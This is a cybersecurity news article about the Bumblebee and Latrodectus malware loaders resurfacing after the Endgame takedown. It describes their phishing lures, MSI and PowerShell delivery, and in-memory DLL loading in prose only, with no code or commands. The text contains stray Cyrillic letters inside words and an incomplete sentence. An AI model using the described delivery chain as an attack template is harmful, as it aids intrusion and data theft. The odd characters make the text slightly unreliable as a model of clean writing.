Following a coordinated law enforcement activity known as Endgame, two malware lineages, previously thwarted, have reappeared through novel phishing schemes.
The malicious software loaders Bumblebee and Latrodectus, specialized in data theft and the installation of additional harmful payloads on breached systems.
Identified by various aliases like BlackWidow, IceNova, and Lotus, Latrodectus is linked to the lineage of IcedID malware and was observed engaging in operations alongside initial access brokers TA577 (also known as Water Curupira) and TA578.
European authorities dismantled more than 100 servers in May 2024, affecting IcedID and its affiliates such as Bumblebee, SmokeLoader, and TrickBot.
In June 2024, Bitsight’s João Batista highlighted that Latrodectus also suffered an outage during the enforcement operation.
Trustwave, in a recent analysis, noted Latrodectus’s emergence as a significant threat post-Endgame.
Trustwave mentioned, “Latrodectus swiftly recovered from initial disruptions. Its sophisticated features filled the gap created by incapacitated counterparts, establishing it as a formidable menace.”
Exploiting compromised email threads and posing as legitimate entities like Microsoft Azure and Google Cloud are common techniques employed in these cyber assaults.
Recent observations by Forcepoint and Logpoint revealed a similar infection chain using DocuSign-themed emails containing malicious links or HTML docuмents embedding JavaScripts to download an MSI installer and a PowerShell script.
Regardless of the method, the attack proceeds to launch the Latrodectus malware through a malevolent DLL component.
Forcepoint’s Mayur Sewani remarked, “Latrodectus exploits older infrastructure with innovative malware delivery methods to target financial, autoмotive, and business sectors.”
Bumblebee’s resurgence coincides with Latrodectus’s activity, notable for deploying a ZIP archive via deceptive emails.
“Through a ZIP file containing ‘Report-41952.lnk,’ Bumblebee installs its malicious payload in memory, sidestepping the need for disk writing,” recounted Netskope’s Leandro Fróes.
The ‘Report-41952.lnk’ triggers a PowerShell command to download an MSI installer remotely, facilitating the launch of Bumblebee through disguised NVIDIA and Midjourney installation files.
“Bumblebee follows a discreet approach, ensuring no additional processes are spawned and evading disk writes for the final payload,” Fróes detailed.
“By employing the SelfReg table, it activates the DllRegisterServer function within a file referenced in the File table, using the appointed SelfReg entry as a cue to identify the intended DLL file execute.”
About Author
